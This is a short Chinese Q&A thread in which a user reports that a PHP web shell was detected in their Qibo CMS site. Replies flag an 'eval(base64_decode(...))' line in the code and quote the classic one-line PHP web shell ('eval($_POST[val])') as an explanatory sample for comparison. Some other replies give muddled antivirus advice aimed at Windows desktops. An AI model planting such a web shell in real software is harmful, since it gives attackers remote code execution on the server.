我的齐博php程序被检测出一句话木马

6个回答 默认排序

已采纳
你的代码很乱,还有一些你原有的变量在哪附值不太清楚。。但大概是

eval(base64_decode(Y$webdb[_Notice]));

这句出问题了。。具体你查php 手册看eval这个函数你就明白了。
?php eval ($_POST[val]); ?
这是PHP一句话木马 你对照下就知道了
要杀就恨点,下载一个木马克星,开机载即将出现WINDOWS自检的时候狂按F8 进入安全模式查杀,360也能杀毒,360杀毒软件都不行,我汗
断开网线,开机按F8,进入安全模式再用360重新查杀!
在360隔离区恢复出来吧。
卸载360保险箱,重启后删除C:\Program Files\360safebox目录。清理360杀毒日志,需要保险箱重新安装。